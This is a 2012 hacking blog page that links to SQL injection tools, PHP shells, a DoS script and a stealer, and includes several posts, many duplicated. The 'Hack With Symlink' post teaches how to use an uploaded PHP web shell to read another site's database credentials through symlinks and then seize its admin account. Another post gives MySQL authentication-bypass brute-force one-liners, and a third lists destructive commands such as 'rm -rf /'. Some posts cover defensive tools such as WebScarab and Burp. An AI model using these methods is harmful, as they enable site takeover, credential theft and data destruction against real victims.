- Armitage : Graphical Cyber Attack Management Tool
- BSQL Hacker : automated SQL Injection Framework Tool
- BlaZer's Tool Kit - All in One Hacking Tools Pack : Free Download
- Collection Of Best PHP and ASP shells
- Collection of best SQL injection Tools
- Collection of best SQL injection Tools : Part 2
- Dark-Jumper v5.8 : SQLi, LFi RFi Scanner
- Free Download : Anti Hacker Toolkit
- Free Download : Hackers professional toolkit : collection of Hacking tools
- Free Download : Havij 1.15 pro Final
- Free Download : Pangolin Professinal Usb Edition
- Free Download : Wireless Hacking Tools 2011
- Hack SQLi Vulnrable Websites with SQL map : Automatic SQL Injection Tools
- Hexjector : Opensource,Cross Platform PHP script to automate Site Pentest for SQL Injection Vulnerabilties.
- How to hack Websites using Havji (all Versions)
- Mr.Dark Soul's Wordpress Blog Hacker
- OpenSCAP : open-source framework
- PHP Dos/DDOS (Denial Of Service) Attack Script
- Paki Hacking Tool kit By Dr. Trojan
- Pangolin : Automatic SQL Injection & PenTesting Tool
- Pesca 0.75 local stealer Ftp+Mail+Php Uploader + Php logger
- Remote Administrator with ProRat v1.9
- SQLYog : MySQL injection Tool
- Safe3SI : SQLi vulnerabale websites & Database Hacking Tool
- Web Hacking with DVNA
- Website Vunerablity Scanner : SQLi | LFI | XSS | Shell Upload
- website Hacking With Real SQL : Automatic SQL Injection Tool
Hacking tirck and tips, android hacks, iphone hacks,learn hackig,network security and ethical hacking
Friday, 28 September 2012
Hacking Tools
Saturday, 22 September 2012
Hack With Symlink
Hello guys, this article is for the beginners webhackers through this article I m going to teach you all about the Symlink
What is symlink?
Symlink is a method used by hackers to read files from other users on a linux server, only by using a php-shell.
Let me clarify the requirements which are necessary to learn the symlink:
Requirements are:
- One phpshell uploaded in a linux server (Safe MODE = OFF )
- basic phpshell & linux knowledge
- and last but not least brain !
So what are we waiting for let us start with the tutorial.
Where to get a target, if you only have a phpshell uploaded in a linux server that has some sites?
It’s easy first get the IP of the server.
Then go to bing.com and search like that:
Code: ip:xx.xxx.xxx.xxx vbulletin
xxx replace with the ip address of the server , and ‘vbulletin’, you can change to a name of a forum software or a CMS you wish as a target. But for this example I will take vBulletin.
OK, now we got the target site, let’s suppose that its domain name is mytarget.com and it uses vBulletin forum software.
Now starts the real hacking!
Go to your phpshell , and in the ‘Execute command’ field , execute there that command :
Code: ls -la /etc/valiases/mytarget.com
By executing this command, I will get the name of the user (on the linux server) that keeps the website mytarget.com.
It should return with a result similar to that :
>>>>>>>-rw-r–r– 1 target mail 28 May 28 2011 /etc/valiases/mytarget.com
The red colored piece is the user of mytarget.com on the server.
So in our case the username is ‘target’
Many of us know that the configuration file of vBulletin script ,can be found in /includes/config.php.
This is the file we need to read in our case , in order to get access at our target site.
How can we read that file?
Simple, execute that command on the shell :
Code: ln -s /home/target/public_html/includes/config.php symlink.txt
As you can see, we’re writing the content of config.php , into symlink.txt file. After you execute the command , you will se a new file called symlink.txt. Open it and You successfully read the configuration file (symlinked). Now, just get an MySQL connector script coded in PHP , and login with the details you get from configuration file of your target.T hen at the admin table, get the admin’s hash and crack it , or better , change the admin’s email you yours , and then do a forgot password at mytarget.com And then you successfully will get full access in your target site !
That was all very easy all you need is to practice it many times.
What is symlink?
Symlink is a method used by hackers to read files from other users on a linux server, only by using a php-shell.
Let me clarify the requirements which are necessary to learn the symlink:
Requirements are:
- One phpshell uploaded in a linux server (Safe MODE = OFF )
- basic phpshell & linux knowledge
- and last but not least brain !
So what are we waiting for let us start with the tutorial.
Where to get a target, if you only have a phpshell uploaded in a linux server that has some sites?
It’s easy first get the IP of the server.
Then go to bing.com and search like that:
Code: ip:xx.xxx.xxx.xxx vbulletin
xxx replace with the ip address of the server , and ‘vbulletin’, you can change to a name of a forum software or a CMS you wish as a target. But for this example I will take vBulletin.
OK, now we got the target site, let’s suppose that its domain name is mytarget.com and it uses vBulletin forum software.
Now starts the real hacking!
Go to your phpshell , and in the ‘Execute command’ field , execute there that command :
Code: ls -la /etc/valiases/mytarget.com
By executing this command, I will get the name of the user (on the linux server) that keeps the website mytarget.com.
It should return with a result similar to that :
>>>>>>>-rw-r–r– 1 target mail 28 May 28 2011 /etc/valiases/mytarget.com
The red colored piece is the user of mytarget.com on the server.
So in our case the username is ‘target’
Many of us know that the configuration file of vBulletin script ,can be found in /includes/config.php.
This is the file we need to read in our case , in order to get access at our target site.
How can we read that file?
Simple, execute that command on the shell :
Code: ln -s /home/target/public_html/includes/config.php symlink.txt
As you can see, we’re writing the content of config.php , into symlink.txt file. After you execute the command , you will se a new file called symlink.txt. Open it and You successfully read the configuration file (symlinked). Now, just get an MySQL connector script coded in PHP , and login with the details you get from configuration file of your target.T hen at the admin table, get the admin’s hash and crack it , or better , change the admin’s email you yours , and then do a forgot password at mytarget.com And then you successfully will get full access in your target site !
That was all very easy all you need is to practice it many times.
Sunday, 16 September 2012
MySQL 1 Liner Hack Gives Root Access Without Password
MySQL 1 Liner Hack Gives Root Access Without Password
The latest news that has hit the streets is the occurence of the easiest hack ever, if you have local shell access (any user privelege level) and you can connect to MySQL – you can get root access to MySQL within a few seconds.I tried this yesterday on one of my servers on Ubuntu 12.04 running the latest version of MySQL in the repo…and it worked in about 30 seconds. Scary really, you can use this single line of bash to hack MySQL:
1
|
while [ 1 ];do mysql -u root --password=123; done
|
1
2
3
4
5
|
#!/usr/bin/python
import subprocess
while 1:
subprocess.Popen("mysql -u root mysql --password=blah", shell=True).wait()
|
Security experts have identified some 879,046 servers vulnerable to a brute force flaw that undermines password controls in MySQL and MariaDB systems.There’s a lot of vulnerable servers out there, so you better hope they aren’t yours because it’s not hard to scan whole subnets for servers with port 3306 open that accept connections from the outside world.
According to Rapid7 security chief HD Moore, one in every 256 brute force attempts could override authentication controls on the servers and allow any password combination to be accepted. An attacker only needed to know a legitimate username which in most circumstances included the name ‘root’.
The flaw has already been exploited. Moore reported that the flaw (CVE-2012-2122) was already patched for both MySQL and MariaDB, but many MySQL administrators had not fixed the hole in their deployments.
Upon scanning 1.7 million publicly exposed MySQL servers, he found more than half (879,046) vulnerable to the “tragically comedic” flaw.
And if your server is in that state – it’s vulnerable. I just checked the repos for Ubuntu 10.04 LTS and Ubuntu 12.04 LTS and they both have a patched version of MySQL available for download so I suggest you get on your servers and do -
1
|
aptitude update; aptitude safe-upgrade
|
Affected versions, listed below, require for memcmp() to return an arbitrary integer outside of the range -128 to 127. All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5 and 5.5.22 were vulnerable, Golubchik said.Honestly I find that this is a really serious vulnerability, but has a pretty low risk profile. It will only work in cases of badly configured MySQL users where they accept connections from any IP address – user@% type entries in the user table.
Moore and other security boffins identified vulnerable versions in Ubuntu 64-bit versions 10.04, 10.10, 11.04, 11.10, and 12.04, OpenSUSE 12.1 64-bit MySQL 5.5.23, and Fedora. Official builds of MariaDB and MySQL were safe, along with Red Hat Enterprise Linux 4, 5 and 6 and some flavours of Debian Linux and Gentoo 64 bit.
A list of accessible MySQL servers found 356,000 deployments running versions of 5.0.x, followed by 285,000 running 5.1.x, and 134,436 running 5.5.x. Another list of MySQL build flavours revealed 43,900 running Ubuntu, 6408 on Debian, and 98,665 on Windows.
NO ONE should be running root@% – so that would mean the attacker would need local shell access. And well if they have that, it’s pretty much game over anyway.
Windows XML Core Services Exploit Attacked In The Wild – CVE-2012-1889
Windows XML Core Services Exploit Attacked In The Wild – CVE-2012-1889
Oh look, another serious flaw in Windows – and this one is really bad because it can be exploited directly in Internet Explorer.And even worse than that, this vulnerability is actually being exploited in the wild by cybercriminals – this shows it’s no longer a theoretical attack. Plus of course the fact, it’s actually unpatched – so even if you’ve applied all the available Windows updates – it’s still exploitable.
An unpatched Windows vulnerability considered a critical threat by security experts is being exploited by cybercriminals.This is a serious issue, even when it gets patched it’ll still be a serious issue as people and companies tend to be slow in applying patches and quite often people turn off Windows Update entirely because they find it annoying and quite often the updates cause more problems than they solve (Black screen of death etc).
Microsoft disclosed the flaw in XML Core Services (MSXML) 3.0, 4.0 and 6.0 June 12 during its monthly release of patches. The security advisory, which was separate from the patch release, offered a workaround for vulnerability CVE-2012-1889, but no fix. The vulnerability is easily exploited through Internet Explorer.
Security vendor Sophos reported Tuesday that it discovered over the weekend a web page crafted to take advantage of the flaw. The page was on the site of an unidentified European medical company, which did not know its website had been hijacked, Sophos said.
Cybercriminals often hide malware on legitimate websites for so-called drive-by installs. To lure people to the compromised site, hackers typically use specially crafted email to entice recipients to click on a link to the infected page.
Marcus Carey, a security researcher at Rapid7, said his company was sure cybercriminals everywhere were exploiting the widely known vulnerability. “That vulnerability is definitely being exploited in the wild,” he said Wednesday. Unpatched software flaws that are disclosed publicly become priority No. 1 for cyber-criminals, who know that companies and people are slow to install patches, and even slower to apply workarounds.
Plus the fact that it’s easily exploitable in the browser, this is not a complex multi-layered attack or something that needs network exposure to work.
A lot of anti-virus software vendors have issued updates that detect this exploit and will help mitigate against the threat until a proper patch is issued by Microsoft.
The latest vulnerability is particularly serious because it can be easily exploited. “The only thing you have to do is visit a website that’s been compromised, and you’re going to compromise your system,” Carey said. “Anyone running Internet Explorer should be terrified unless they apply the [Microsoft] fix-it.”The vulnerability notation for this is: CVE-2012-1889 – if you want to keep tabs what’s going on with it.
MSXML is a set of services used in building Windows-native XML-based applications. The latest flaw affects all releases of Windows and Office 2003 and 2007. A successful attacker could use the vulnerability to gain full user rights to a PC, Microsoft said.
Until a patch is released, the Microsoft workaround is the only way to stymie hackers. Many security vendors have updated their products to detect malicious code that tries to exploit the vulnerability. “Although security software can protect against this vulnerability, let’s hope that Microsoft can release a proper patch sooner rather than later,” Paul Baccas, senior threat researcher at Sophos, said in the company’s blog.
Google reported the vulnerability to Microsoft on May 30 and worked with the software maker.
Tuesday, 11 September 2012
How to Hack a Password on Windows 7 with Software
Believe or not, no matter if you’ve forgotten password for a Windows XP,
Vista or even Windows 7 system, there are easy ways to get it back
again. The problem is how? You may think of “hack”. Well, indeed, this
article will show you how to hack Windows 7 password
when you forgot or lost it. However, what I will show you—ways to crack
lost Windows 7 computer password are all legal, they are not like what
you think illegal “hack”. If you are doubting or even don’t believe,
then just read over the passage, you will be persuaded.
Hack password for Windows 7 with professional third-party password recovery utility.
We all know if forget your computer password, Microsoft won’t offer you related service to solve the problem. Well, this really gives promising marketing chances to many software providers—providing the professional third-party password recovery applications. I cannot promise all of the third party password recovery applications are good ones, however, if I choose, I will trust Windows Password Recovery Professional. For no bug, no potential safety hazard, clean, and easy to use, instant to get back password etc., those are all good traits with the utility. Interested in it? Then let’s have a careful look over it!
Guide on how to crack Windows 7 password with Windows Password Recovery Professional.
Step1: Download Windows Password Recovery Professional from SmartKey website.
Step2: Install and launch it to any accessible computer.
Step3: Use a blank and writable CD/DVD/USB to burn Windows 7 password reset disk with the tool.
Step4: Boot the locked computer from CD/DVD/USB.
Step5: Start to remove Windows 7 password with the burned disk.
Step6: Reboot computer and login to the locked PC without password.
No matter how complicated or how long your Windows 7 password is, this application—Windows Password Recovery Professional will instantly hack it within one minute! Only one minute later, you can regain access to your PC without limitation!
Change Windows 7 password with freeware—Ophcrack.
Ophcrack is an open source and free program that bypass Windows passwords by using LM hashes through rainbow tables. The Ophcrack Windows password reset is by far the fastest free Windows 7 password hacker tool available.
While compared with other professional Windows password recovery software, of course, Ophcrack, as a freeware, has some limitations. In the test on my Win 7 PC, Ophcrack can recover at most a 10-character password to my administrator account. Well, for the purpose of safety, I do recommend you to use a professional Windows password recovery tool.
Hack password for Windows 7 with professional third-party password recovery utility.
We all know if forget your computer password, Microsoft won’t offer you related service to solve the problem. Well, this really gives promising marketing chances to many software providers—providing the professional third-party password recovery applications. I cannot promise all of the third party password recovery applications are good ones, however, if I choose, I will trust Windows Password Recovery Professional. For no bug, no potential safety hazard, clean, and easy to use, instant to get back password etc., those are all good traits with the utility. Interested in it? Then let’s have a careful look over it!
Guide on how to crack Windows 7 password with Windows Password Recovery Professional.
Step1: Download Windows Password Recovery Professional from SmartKey website.
Step2: Install and launch it to any accessible computer.
Step3: Use a blank and writable CD/DVD/USB to burn Windows 7 password reset disk with the tool.
Step4: Boot the locked computer from CD/DVD/USB.
Step5: Start to remove Windows 7 password with the burned disk.
Step6: Reboot computer and login to the locked PC without password.
No matter how complicated or how long your Windows 7 password is, this application—Windows Password Recovery Professional will instantly hack it within one minute! Only one minute later, you can regain access to your PC without limitation!
Change Windows 7 password with freeware—Ophcrack.
Ophcrack is an open source and free program that bypass Windows passwords by using LM hashes through rainbow tables. The Ophcrack Windows password reset is by far the fastest free Windows 7 password hacker tool available.
While compared with other professional Windows password recovery software, of course, Ophcrack, as a freeware, has some limitations. In the test on my Win 7 PC, Ophcrack can recover at most a 10-character password to my administrator account. Well, for the purpose of safety, I do recommend you to use a professional Windows password recovery tool.
Monday, 10 September 2012
Web Scarab 2: Proxy
In this tutorial I’ll tell you about some basic s of HTTP proxy in
the WebScarab. HTTP Proxy is very useful when you have to do the
Vulnerability assessment of web application, it allows you to record the
whole request data packet and respond data packet and after that you
can analyze the incoming and outgoing data through HTTP Proxy.
In this tutorial we basically focus on WebScarab, although there are numerous tools in market (e.g. Paros, Burp etc). First-of-all you have to start the WebScarab, by default the listening port is 8008 but you can change also and other settings that you have to do are shown below:
We’ll also need to configure our browser so that our communication is pointed through the proxy. In recent versions of Firefox the path should be Tools >> Options >> Advanced Tab >> Network Tab >> Settings. Once there you’ll need to highlight “Manual proxy configuration”, then for “HTTP Proxy” type in “localhost” and for port use 8008. You’ll also need to do this for the SSL proxy if the web application uses SSL, as shown in fig:
This tutorial is going to show how WebScarab can walk through web application provided by Foundstone, Following figure shows the login page for this application.
I have already created an account within the application with the username “hacker” and a password of “passwd”. So with WebScarab already running in the background I am going to login to facebook. If you are on the summary tab within WebScarab you will notice requests and responses filling up rows in the bottom pane. WebScarab is logging all communication between you and the web server, this includes all images, CSS files, Javascript files, parameters, etc. The top pane of the summary tab shows you a directory structure of your history through the web application. This summary tab can be seen in Fig.
You can see in Fig that Webscarab has intercepted both the username “hacker” and password “passwd”. A HTTP proxy is able to see the password even though each character was replaced by an asterisk within the application. At this point you could accept the request or manipulate the parameters. You could try to login as someone at this point even though you initially typed in a different username and password. With a HTTP proxy you could manipulate any request / response not just the login process.
In this tutorial we basically focus on WebScarab, although there are numerous tools in market (e.g. Paros, Burp etc). First-of-all you have to start the WebScarab, by default the listening port is 8008 but you can change also and other settings that you have to do are shown below:
We’ll also need to configure our browser so that our communication is pointed through the proxy. In recent versions of Firefox the path should be Tools >> Options >> Advanced Tab >> Network Tab >> Settings. Once there you’ll need to highlight “Manual proxy configuration”, then for “HTTP Proxy” type in “localhost” and for port use 8008. You’ll also need to do this for the SSL proxy if the web application uses SSL, as shown in fig:
This tutorial is going to show how WebScarab can walk through web application provided by Foundstone, Following figure shows the login page for this application.
I have already created an account within the application with the username “hacker” and a password of “passwd”. So with WebScarab already running in the background I am going to login to facebook. If you are on the summary tab within WebScarab you will notice requests and responses filling up rows in the bottom pane. WebScarab is logging all communication between you and the web server, this includes all images, CSS files, Javascript files, parameters, etc. The top pane of the summary tab shows you a directory structure of your history through the web application. This summary tab can be seen in Fig.
Webscarab Summary Tab
Now a summary of your history is neat but that only scratches the
surface of Webscarab’s functionality. One of the best functions of a
HTTP proxy is the ability to intercept requests on the fly or replay
those requests at a later time. In order to intercept requests /
responses make sure you have checked the “Intercept requests” /
“Intercept responses” checkboxes in the Proxy >> Manual Edit tab.
These settings can be seen in Fig.
Webscarab Intercept Settings
You may be wondering why you would want to intercept or repeat a HTTP
request / response. The simple answer is to learn more about what a
website is doing with your input (e.g. SSN, credit card, personal
information). Application security folks, developers, or curious people
may want to understand more about the web application they’re using.
Intercepting a request / response will allow you to see and manipulate
communication being sent back and forth. Application security analysts
like to replay requests over and over again with different inputs to see
what the application will allow as input. This will give security
analysts an idea of how secure the application is. Had we intercepted
the login process you would have seen the inputs for username and
password being sent to the web server. A screen shot of this can be seen
in Fig.You can see in Fig that Webscarab has intercepted both the username “hacker” and password “passwd”. A HTTP proxy is able to see the password even though each character was replaced by an asterisk within the application. At this point you could accept the request or manipulate the parameters. You could try to login as someone at this point even though you initially typed in a different username and password. With a HTTP proxy you could manipulate any request / response not just the login process.
WebScarab 3: Session ID Analysis
In this tutorial we focus on session ID
analysis. If you are not familiar with session ID’s I’ll do a quick
explanation. HTTP is a stateless protocol, so it’s equivalent to walkie
talkies or CB radios. You’ll send a request and wait for a reply, you
don’t have a constantly open communication line as you would with a
phone. So in order to emulate this open communication the HTTP protocol
uses session ID’s, commonly known as cookies. These cookies are simply
agreements between you and the web application that you are who you
claim to be. Once you have exchanged your cookie with the website you
can then talk back and forth as long as the cookie is tied to your
communication. So there’s the quick and dirty intro to session ID’s. So
the next logical question is how does this session ID process work or
even better how should it work? Let’s use a web mail application as an
example:
- You login to your web mail account
- Your web mail provider sends you a “random” cookie that is tied to your login session
- Each time you click on a new message within your Inbox your cookie is sent along to validate who you claim to be, that way you’ll get your next message and not another person’s message.
These are the basic steps. The main thing
to remember is that your login credentials are tied to the session ID /
cookie. So the key to keeping your conversations private is protecting
the session ID and making it hard to guess. Session ID’s are similar to
passwords in that regard, you always want to keep them a secret and make
them hard to guess. When Webscarab analyzes the session ID it only
focuses on if the session is easy or hard to guess (aka randomness). So enough with the chit chat let’s see how Webscarab analyzes session ID’s.
Once again we’re going to be analyzing the login web application. The login page for this application can be seen in Fig.
Login page
So with WebScarab already running in the
background I’ll go ahead and login into and click on a few links.
Navigating inside the application will generate requests and responses
that we can later analyze. Now the login process should generate a
session ID but there could be other session ID’s generated within the
application that you may want to analyze as well. You could always keep
an eye on the summary tab to see if you are capturing cookies. There are
other ways to maintain state within a web application but cookies are
the most common. When looking at the summary tab for the login process
you can see that cookies are being set. This can be seen in the first
conversation in the bottom row on Fig.
Login process of login page
So the conversation with the path
/account/login is setting a cookie, also the top pane has a check mark
indicating that the login URL is setting a cookie as well. This is
definitely a good target because we know the functionality of this
session ID is to maintain my balance and gambling stats. Some session
ID’s can be tough to figure out and sometimes it seems like developers
set cookies for no reason. So now let’s walk through the steps to
analyze the session ID associated with /account/login.
- Log out of the current session. I can’t stress this enough, the first time I was using this feature I bumbled around for a couple of hours trying to figure out why it wasn’t analyzing the sessions. Further down in this article I’ll show you a screen shot of what it looks like when you try and analyze the session you are currently logged into.
- Navigate to the Session ID Analysis tab >> Collection tab within Webscarab. There you will see a drop down list labeled “Previous Requests”, here you can pick a conversation from your history of transactions within the web application to analyze. We already know that we want to analyze the /account/login conversation because we saw that it was setting cookies. If you were unsure which conversation used session ID’s you could click on the “Test” button to verify if session information existed. Fig shows a screen shot of me choosing the /account/login conversation for analysis.
Choosing conversation in Collection tab
- After you have chosen your conversation for analysis you will then click on the “Fetch” button to start collecting session ID’s from the web server. The default number of session ID’s collected is set at 100 but you can choose more if you like. My background is math and science so I’m of the opinion that you can never have to many data points. Play with this number if you like, in my experience more samples will do a better job at producing trends and pointing out weaknesses in random number generation. The law of diminishing returns will eventually kick in though. So after you have clicked the “Fetch” button you will need to move over to the “Analysis” tab. When you first click on the “Analysis” tab it may seem like nothing is happening, this is because you need to select your session ID from the “Session Identifier” drop down list. This drop down list can be seen in Fig
Choosing session in Analysis tab
Once you have selected your session that
you are analyzing the table should begin to populate with the number of
samples that you chose in the Collection tab. Webscarab takes the
session ID’s found within the web application and converts them into
numbers so that they can be easily parsed. These numbers are then
compared to one another for predictability. Figure 5 below shows what
happens when you try to analyze the current session, you’ll get zeros
for both the Numeric value and the difference. This is because the
session ID / cookie stays the same.
Analyzing current session- The fourth and final step is neatest part of the session ID analysis functionality within Webscarab, the Visualization tab. This tab creates a graph using the numbers from the Analysis tab. This will give you a quick visual representation of how weak or strong the session ID’s are. The graphical analysis of the Hacme Casino session ID’s can be seen below in Fig.
Cookies over time for login page
It appears that the session ID’s created
for login page are random or at the very least not easy to guess. Your
average malicious user is going to see that the session ID’s are going
to be difficult to guess, so they’ll move on and try another vector to
get inside the web application. A malicious user will be looking for
easy access so they will be looking for session ID’s that are very easy
to guess. Fig shows an application that implements session ID’s that are
very easy to guess.
Weak cookies over time
This graph was not generated using Foundstone’s login but had a
malicious user seen this type of graph it would be very easy for them to
guess a session ID and essentially hijack that person’s login account.
From the casino example you can see how dangerous weak session ID’s can
be. Session ID’s are the “key” to someone’s account information. This is
possible due to the stateless nature of HTTP. So a malicious user could
hijack your account without ever knowing your username or password.Burp Suite 5: Sequencer | Comparer | Decoder
Burp Sequencer
The Burp Sequencer tool is used to check for the extent of randomness in the session tokens generated by the Web application. Brute force attacks enumerate every possible combination for gaining authentication from the Web application. Thus it is important to have a high degree of randomness in the session token IDs. For this Burp Suite training tutorial, let us start with sending a request that contains a session token.
Token request using sequencer
Figure 1 shows a token request to the website google.com. The right
side of the screenshot has the token start and token end expressions.
You can either specify an expression such as “Google” or even set the
offset from where the token has to start. This also applies to the token
end panel, where you can set the delimiter, or specify a fixed length
for the capture to start. After fixing these parameters, click START
CAPTURE.
Start capture action panel
The start capture action panel is depicted in Figure 2. It
sends requests to the target and gives detailed analysis of the
randomness in the cookie tokens. You can pause or stop the analysis at
any point. For this Burp Suite training tutorial, stop the scan midway
and check out the results. The screenshot in Figure 3 explains the
results better.
Token randomness analysis results
The scan components are as follows:- Overall result
- Effective entropy
- Reliability
- Sample size
For this Burp Suite training tutorial, let us look at the following options provided by Burp sequencer. None of these is compulsory for analysis and they can be chosen or dropped as desired.
1. Character count analysis
This test analyzes the distribution of characters used within each token.
2. Character transition analysis
This test analyzes the transition of characters between successive tokens. Depending on the randomness of the characters, the transitional analytics vary.
FIPS monobit test
This test does an analysis of the positions of 0s and 1s at each bit position. If the generation is random, then the distribution is likely to be approximately equal.
a. FIPS poker test
This divides the bit sequence into consecutive and unique groups of four. The distribution is evaluated by a chi-square calculation method.
b. FIPS runs test
As the name suggests, the bit sequence is divided into runs of consecutive bits with the same value.
c. FIPS long runs test
Similar to FIPS runs test, this test analyzes the longest bit sequence with consecutive bits of the same value.
d. Spectral tests
This is an advanced method with complex statistical analytics. It treats a bit sequence as a point in multidimensional space and performs the analytics.
e. Correlation test
The tests described thus far analyze each bit in an isolated manner. The correlation test puts together these isolated results and presents the analytics by considering bits as a whole.
f. Compression test
This test works on the principle of the standard ZLIB compression technique. The bit sequences are compressed and the degree of compression is calculated. A higher degree of compression translates to a lower degree of randomness.
Burp Decoder
The Burp Decoder Tool is used to send a request to the decoder. Within the decoder, there are multiple options to encode the request in various formats such as base64, URL, and so on. There are also options to convert it to hashes such as MD5 or SHA-1.
Burp Decoder
Figure 4 depicts a Burp Decoder request. For our Burp Suite training
tutorial, consider an encoded request such as the one shown in Figure 5.
The upper portion shows a request encoded in the base64 format while
the lower one depicts the request decoded into plain text. While the
entire request has been encoded here, you could also selectively choose a
portion of the request to decode/encode.
Encoded Request
This tool is useful when there is client-side encryption of username
and password into commonly used hashes or encoders. The username or
password field can be selectively decoded and the content then viewed in
plaintext.Burp Comparer
Burp Comparer is used for comparisons between two sets of data. For instance, the two sets could display responses to two different requests. The comparison can be performed either on a word scale (word by word) or bit by bit. Burp automates this process for the user and compares the two requests or responses accordingly. For this Burp Suite training tutorial, the comparison shown in Figure 6 is of two different requests to a website.
Comparison of requests to a website
This ends the Burp Suite training tutorial series. The extent to
which Burp Suite can be used is limited only by the imagination of the
userSaturday, 8 September 2012
Security Issues With FTP
Security Issues With FTP
Security Issues With FTP
FTP, file transfer protocol, is widely used on the Internet for transferring files. Though FTP has a terrible security record it continues to be very popular, mainly because it is so simple to setup and use. There is a great deal of FTP software available.
WU-FTPD, the Washington University FTP daemon, has been a popular choice with many recently because it provides these security features that have been lacking in some options in the past:
log all incoming and outgoing file transfers
log all commands used by users
compression on the fly
organize users into classes so that limits on classes can be used
control uploads on each directory individually
display messages
support virtual hosts
ProFTPD has been configured and designed to be more secure than WU-FTPD. ProFTPD was rewritten from scratch to provide greater security. The security features that it provides are:
directory access using .ftpaccess files
anonymous FTP root directory
support for hidden files
self-contained
uses an unprivileged user in stand-alone mode
Both of these FTP servers are widely used. However, CentOS uses a FTP program that offers greater security and scalability , VSFTPD.
VSFTP
VSFTPD has replaced the WU-FTPD with a more secure ftp daemon. This ftp program is labeled as more secure, stable, faster and more scalable. VSFTPD has taken steps to minimize the privileges it takes to run the ftp program. Each user runs at the level of least privilege.
Check Out the Website to see speed and security comparisons. http://vsftpd.beasts.org/
An example of what VSFTPD is trying to eliminate is WU-FTPD. When you log in as an anonymous user with WU-FTPD, a process is run for the ftp session, that process must run as root on the remote machine. This does not occur with VSFTPD.
VSFTPD uses chroot which would minimize damage if a user did compromise the server.
Secure Design:
1. Parsing and acting on potentially malicious remote network data uses an unprivileged user process. In addition a chroot () jail is used to ensure only the ftp files are accessible.
2. Privileged operations are done with a privileged parent process.
3. All requests received by the parent process are distrusted.
4. The privileged parent process uses capabilities and chroot() to always run in the least privileged user possible. The privileged parent constantly calculates the necessary privileges.
Buffer Overflow:
Buffer overflow problems have been the source of many security issues. Systems can be compromised by buffer overflows. vsftpd uses an API to hide the buffer handling from the user and one piece of generic code is used to deal with buffer handling for simplicity.
FTP, file transfer protocol, is widely used on the Internet for transferring files. Though FTP has a terrible security record it continues to be very popular, mainly because it is so simple to setup and use. There is a great deal of FTP software available.
WU-FTPD, the Washington University FTP daemon, has been a popular choice with many recently because it provides these security features that have been lacking in some options in the past:
log all incoming and outgoing file transfers
log all commands used by users
compression on the fly
organize users into classes so that limits on classes can be used
control uploads on each directory individually
display messages
support virtual hosts
ProFTPD has been configured and designed to be more secure than WU-FTPD. ProFTPD was rewritten from scratch to provide greater security. The security features that it provides are:
directory access using .ftpaccess files
anonymous FTP root directory
support for hidden files
self-contained
uses an unprivileged user in stand-alone mode
Both of these FTP servers are widely used. However, CentOS uses a FTP program that offers greater security and scalability , VSFTPD.
VSFTP
VSFTPD has replaced the WU-FTPD with a more secure ftp daemon. This ftp program is labeled as more secure, stable, faster and more scalable. VSFTPD has taken steps to minimize the privileges it takes to run the ftp program. Each user runs at the level of least privilege.
Check Out the Website to see speed and security comparisons. http://vsftpd.beasts.org/
An example of what VSFTPD is trying to eliminate is WU-FTPD. When you log in as an anonymous user with WU-FTPD, a process is run for the ftp session, that process must run as root on the remote machine. This does not occur with VSFTPD.
VSFTPD uses chroot which would minimize damage if a user did compromise the server.
Secure Design:
1. Parsing and acting on potentially malicious remote network data uses an unprivileged user process. In addition a chroot () jail is used to ensure only the ftp files are accessible.
2. Privileged operations are done with a privileged parent process.
3. All requests received by the parent process are distrusted.
4. The privileged parent process uses capabilities and chroot() to always run in the least privileged user possible. The privileged parent constantly calculates the necessary privileges.
Buffer Overflow:
Buffer overflow problems have been the source of many security issues. Systems can be compromised by buffer overflows. vsftpd uses an API to hide the buffer handling from the user and one piece of generic code is used to deal with buffer handling for simplicity.
How to crash Linux?
How to crash Linux?
As root, you can do whatever you want.
Try this command, as root (reconsider if you really want to crash):
# cp /dev/zero /dev/men
As root, you can even erase all the files on your system with a similarly innocuously looking one-liner (don’t do it):
# rm -rf /
This is not to say that Linux is easy to crash, but that the system administrator (”root”) has the complete power over the system so think before when working on Linux as “root” user.
Wipe hard disk completely in linux
Steps to Wipe the Hard Drive Completely
As we all know, mkfs doesn’t erase a lot.mkfs and its variants (e.g.,
mkfs.ext3 and mke2fs) only get rid of a few important data structures on
the filesystem, but the data is still there! For a SCSI disk connected
as /dev/sda, a quick
dd if=/dev/sdb | strings
will let anyone recover text data from a supposedly erased hard drive.
Binary data is more complicated to retrieve, but the same basic
principle applies: the data was not completely erased.
To make things harder for the bad guys, an old trick was to use the ‘dd’ command as a way to erase a drive.
To make things harder for the bad guys, an old trick was to use the ‘dd’ command as a way to erase a drive.
Note: This command will erase your disk!
dd if=/dev/zero of=/dev/sda
There’s one problem with this: newer, more advanced, techniques make it
possible to retrieve data that were replaced with a bunch of 0s. To
make it more difficult, if not impossible, for the bad guys to read data
that was previously stored on a disk, Red Hat ships the “shred” utility
as part of the coreutils RPM package. Launching “shred” on a disk or a
partition will write repeatedly (25 times by default) to all locations
on the disk.
Note: Be careful with this one too!
shred /dev/sda
Note: Be careful with this one too!
shred /dev/sda
This is currently known to be a very safe way to delete data from a
hard drive before, let’s say, you ship it back to the manufacturer for
repair.
Create Multiboot USB Drive: Install Windows 7, XP From Same USB Drive
Create Multiboot USB Drive: Install Windows 7, XP From Same USB Drive
Earlier, we have covered some tutorials: 1.How to install windows XP From USB Drive 2. How to install Windows 7 From USB Drive. Both the processes work fine and the readers feedback was positive. But there were some drawbacks with those procedures:
1. Previous methods of creating of the bootable USB drive for Windows XP involves numbers of steps and takes lot of time to complete.
2. You are to use the similar Operating System to prepare the USB disk. i.e if you want to prepare your USB drive to install Windows XP, you’ll have to use Windows XP to apply the preparation method. The similar condition is applicable when preparing the USB drive for Windows 7.
3. Those methods do not have any option to prepare the USB disk in such a way that it would install both Windows XP and Windows 7 after spending one time effort.
But we found an awesome free utility WinSetupFromUSB which comes across drawbacks and allows you to create a Multiboot USB drive to install Windows XP and Windows 7 from the same USB drive. No need to prepare your USB stick separately. Even the tool works in both Windows XP and Windows 7.
Then follow the steps below:
1. Insert the formatted USB drive in the USB post of your computer and run the WinSetupFromUSB_1-0-beta7.exe.
2. Make sure that the the utility has detected your USB drive.
3. Now enable the option Windows 2000/XP/2003 Setup selecting the check box and browse to the Windows XP installation file location. Next, enable the option Vista/7/Server 2008 Setup/PE/RecoveryISO and browse to the Windows 7 installation files’ location. In both of the cases, if you have the ISO images, extract them by WinRar or 7-Zip.
4. Click the Go button to get started. It might take several minutes.
Though we have discussed the process for only Windows XP and Windows 7, you can also add Windows Vista as well as Linux.
